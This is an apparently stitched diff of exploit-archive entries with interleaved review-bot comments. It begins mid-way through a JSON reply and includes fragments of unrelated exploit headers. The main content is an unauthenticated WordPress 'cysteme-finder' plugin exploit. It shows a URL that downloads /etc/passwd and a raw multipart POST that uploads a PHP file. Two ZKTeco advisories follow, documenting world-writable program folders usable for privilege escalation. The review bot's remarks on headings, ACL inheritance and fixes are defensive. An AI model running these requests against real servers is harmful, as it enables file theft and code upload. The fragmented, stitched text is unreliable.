"name": "Fichiers du site",
"date": "Today 20:44",
"locked": 1,
"dirs": 1
},
{
"mime": "text\/plain",
"ts": 1471714510,
"read": 1,
"write": 1,
"size": 813,
"hash": "l1_Lmh0YWNjZXNz",
"name": ".htaccess",
"phash": "l1_Lw",
"date": "20 Aug 2016 13:35"
},
Simply replacing wphome with any other directory path will return file information for that directory.
If you want to download that file, get the hash value for the file and include it in the following request:
Will download /etc/passwd
http://server/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/etc&cmd=file&target=l1_cGFzc3dk&download=1
### File Upload
As with downloading the files, you will need the hash value for the target directory. With the hash value, send a payload similar to the following.
POST /wordpress/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress/&wpurl=http://server HTTP/1.1
Host: http://server
Content-Length: 314
Origin: http://server
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Type: multipart/form-data; boundary=--------723608748
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close
----------723608748
Content-Disposition: form-data; name="cmd"
upload
----------723608748
Content-Disposition: form-data; name="target"
l1_Lw
----------723608748
Content-Disposition: form-data; name="upload[]"; filename="test.php"
Content-Type: text/html
<?php phpinfo(); ?>
----------723608748--
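Review bot: the `### LFI` heading is wrong for what follows: `cmd=open` and `cmd=file&download=1` against `connector.php` read and return arbitrary files (the title's "Arbitrary File Disclosure", itself misspelled "Dislcosure" on the first line), nothing is included into PHP. In the upload request, `Host: http://server` is not a valid Host header value (it must not carry a scheme), and the JSON reply is cut off after the `.htaccess` entry without its closing brackets, which should be marked as truncated. The summary says the connector "fails to check cookie data" but never says what it should check; the fix for the plugin is to verify a logged-in user with the right capability (and a nonce) before serving any `cmd`, and the `wphome` parameter should not be client-supplied at all, since it is what lets `/etc` be selected as the volume root.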

@ -1,4 +1,4 @@
#!/usr/bin/perl
#!/usr/bin/perl
# Stack overflow in wininet.dll while parsing huge( > ~1M) Content-Type response
# ex.: Unhandled exception at 0x771c00ee in IEXPLORE.EXE: 0xC00000FD: Stack overflow.
#

@ -1,4 +1,4 @@
/*
/*
by Luigi Auriemma

platforms/windows/local/40322.txt Executable file
@ -0,0 +1,112 @@
ZKTeco ZKTime.Net 3.0.1.6 Insecure File Permissions
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.6
3.0.1.5 (160622)
3.0.1.1 (160216)
Summary: ZKTime.Net V3.0 is a new generation time attendance
management software. Meanwhile, it integrates with time attendance
and access control system. Some frequently used functions such as
attendance reports, device management and employee management can
be managed directly on the home page which providing excellent user
experience. Owing to the Pay code function, it can generate both
time attendance records and corresponding payroll in the software
and easy to merge with the most ERP and Payroll software, which can
rapidly upgrade your working efficiency. The brand new flat GUI design
and humanized structure will make your daily management more pleasant
and convenient.
Desc: ZKTime.Net suffers from an elevation of privileges vulnerability
which can be used by a simple user that can change the executable file
with a binary of choice. The vulnerability exist due to the improper
permissions, with the 'C' flag (Change) for 'Everyone' group, making the
entire directory 'ZKTimeNet3.0' and its files and sub-dirs world-writable.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5360
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5360.php
18.07.2016
--
C:\>showacls "c:\Program Files (x86)\ZKTimeNet3.0"
c:\Program Files (x86)\ZKTimeNet3.0
Everyone Change [RWXD]
NT SERVICE\TrustedInstaller Special Access [A]
NT AUTHORITY\SYSTEM Special Access [A]
BUILTIN\Administrators Special Access [A]
BUILTIN\Users Special Access [RX]
CREATOR OWNER Special Access [A]
C:\>showacls "c:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe"
c:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe
Everyone Change [RWXD]
C:\Program Files (x86)>cacls ZKTimeNet3.0
C:\Program Files (x86)\ZKTimeNet3.0 Everyone:(OI)(CI)C
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(ID)R
BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
GENERIC_READ
GENERIC_EXECUTE
CREATOR OWNER:(OI)(CI)(IO)(ID)F
C:\Program Files (x86)\ZKTimeNet3.0>cacls *.exe
C:\Program Files (x86)\ZKTimeNet3.0\LanguageTranslate.exe Everyone:C
Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\ZKTimeNet3.0\unins000.exe Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.DBTT.exe Everyone:C
Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe Everyone:C
Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.Update.exe Everyone:C
Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.ZKTime5DB.exe Everyone:C
Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
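Review bot: the `cacls *.exe` output shows both an explicit `Everyone:C` ACE and an inherited `Everyone:(ID)C` on `ZKTimeNet.exe`, `ZKTimeNet.DBTT.exe`, `ZKTimeNet.Update.exe` and `ZKTimeNet.ZKTime5DB.exe`, so removing the directory ACE alone leaves those files writable; the advisory should point that out and give the fix (strip `Everyone` from the whole `C:\Program Files (x86)\ZKTimeNet3.0` tree, for example `icacls` with `/remove Everyone /t`, so only Administrators and SYSTEM can write). The description also never says which higher-privileged principal executes the replaced binary (a service, a scheduled task, or an administrator launching the GUI); "Privilege Escalation" in the CSV title needs that, because without an automatic or privileged launch this is only a lateral to whichever user runs `ZKTimeNet.exe` next.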

@ -0,0 +1,49 @@
ZKTeco ZKAccess Professional 3.5.3 Insecure File Permissions
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.5.3 (Build 0005)
Summary: ZKAccess 3.5 is a desktop software which is suitable
for small and medium businesses application. Compatible with
all ZKAccess standalone reader controllers, the software can
simultaneously manage access control and generate attendance
report. The brand new flat GUI design and humanized structure
of new ZKAccess 3.5 will make your daily management more pleasant
and convenient.
Desc: ZKAccess suffers from an elevation of privileges vulnerability
which can be used by a simple authenticated user that can change the
executable file with a binary of choice. The vulnerability exist due
to the improper permissions, with the 'M' flag (Modify) for 'Authenticated Users'
group.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5361
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5361.php
18.07.2016
--
C:\ZKTeco>icacls ZKAccess3.5
ZKAccess3.5 BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
Successfully processed 1 files; Failed processing 0 files
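Review bot: every ACE in the `icacls ZKAccess3.5` listing carries the `(I)` flag, i.e. it is inherited from a parent directory (here the listing is run from `C:\ZKTeco`), so the `Authenticated Users:(M)` grant comes from above and the remediation has to be applied on the parent or by breaking inheritance on `ZKAccess3.5`, not on the product folder alone; the advisory should say so. It also lists only the directory ACL: add the ACL of the executable the text says can be replaced, and, as with `40322.txt`, state which privileged context runs it, since that is what turns a writable file into an elevation of privilege. Grammar: "The vulnerability exist" should read "exists".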